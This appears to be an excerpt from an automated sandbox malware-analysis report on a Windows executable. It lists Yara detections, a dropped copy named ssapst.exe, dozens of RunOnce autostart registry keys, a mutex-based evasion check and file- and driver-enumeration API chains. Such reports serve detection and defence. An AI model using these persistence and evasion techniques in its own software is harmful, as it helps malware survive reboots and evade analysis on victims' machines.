Source: Yara match	File source: 2.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.ssapst.exe.3790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.421043250.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.730367046.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.406382399.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.734717569.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.391649222.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.548829843.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.570376945.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.588245655.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.585796532.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.444554151.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.628240997.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.485778645.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.354396039.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.556440908.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.408927489.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.373713609.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.485870462.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.531056963.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.705195952.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.482554766.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.500809556.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.462423463.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.688032587.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.648211037.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.734163456.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.553896559.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.681984770.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.426845599.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.666637056.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.626543672.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.703345921.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.445271222.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.654935793.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.321170731.000000000F4EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.608029027.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.608744037.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.520951774.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.457728648.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.651985737.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wThN5MTIsw.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 6592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 6840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 7028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 5668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 6104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 1416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 3588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 3248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 6228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 5016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 7108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 4804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 1784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 5076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 5700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 972, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, type: DROPPED

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

Code function: 0_2_0F4E8400 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

0_2_0F4E8400

Source: wThN5MTIsw.exe	Static PE information: real checksum: 0x120f7 should be: 0x1d03b
Source: ssapst.exe.0.dr	Static PE information: real checksum: 0x120f7 should be: 0x1dfa7

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce drhgskcsetb
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ftylkauykkg	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qtytdguwutr	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce hdwqlmoiwuh	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce trtwjkdvbrs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rjjumyjxpew	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ypcrxwqpxuk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tzknppvrole
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wwezwkhgyew
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce hedsypabrrz
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce jqnamhtcavd
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce oprgxbvjexb
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ocipuxittak	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qxcdehgjaib	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce vlllmsigvhf
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce biktigczvpq	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xiyxqoiwizj

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qxcdehgjaib	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qxcdehgjaib	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qxcdehgjaib	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qxcdehgjaib	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ocipuxittak	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ocipuxittak	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ocipuxittak	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ocipuxittak	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce trtwjkdvbrs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce trtwjkdvbrs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce trtwjkdvbrs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce trtwjkdvbrs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ftylkauykkg	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ftylkauykkg	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ftylkauykkg	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ftylkauykkg	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce biktigczvpq	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce biktigczvpq	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce biktigczvpq	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce biktigczvpq	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rjjumyjxpew	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rjjumyjxpew	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rjjumyjxpew	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rjjumyjxpew	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ypcrxwqpxuk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ypcrxwqpxuk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ypcrxwqpxuk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ypcrxwqpxuk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qtytdguwutr	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qtytdguwutr	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qtytdguwutr	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qtytdguwutr	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce hdwqlmoiwuh	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce hdwqlmoiwuh	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce hdwqlmoiwuh	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce hdwqlmoiwuh	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce hedsypabrrz
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce hedsypabrrz
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce hedsypabrrz
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce hedsypabrrz
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce oprgxbvjexb
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce oprgxbvjexb
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce oprgxbvjexb
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce oprgxbvjexb
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce vlllmsigvhf
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce vlllmsigvhf
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce vlllmsigvhf
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce vlllmsigvhf
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce drhgskcsetb
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce drhgskcsetb
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce drhgskcsetb
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce drhgskcsetb
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wwezwkhgyew
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wwezwkhgyew
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wwezwkhgyew
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wwezwkhgyew
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tzknppvrole
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tzknppvrole
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tzknppvrole
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tzknppvrole
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce jqnamhtcavd
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce jqnamhtcavd
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce jqnamhtcavd
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce jqnamhtcavd
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xiyxqoiwizj
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xiyxqoiwizj
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xiyxqoiwizj
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xiyxqoiwizj

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_0-1807
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_2-1811

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	0_2_0F4E2F50
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	2_2_0FE62F50
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	4_2_0FE62F50

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E6DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	0_2_0F4E6DF0
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E6BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	0_2_0F4E6BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE66DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	2_2_0FE66DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE66BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	2_2_0FE66BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE66DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	4_2_0FE66DF0
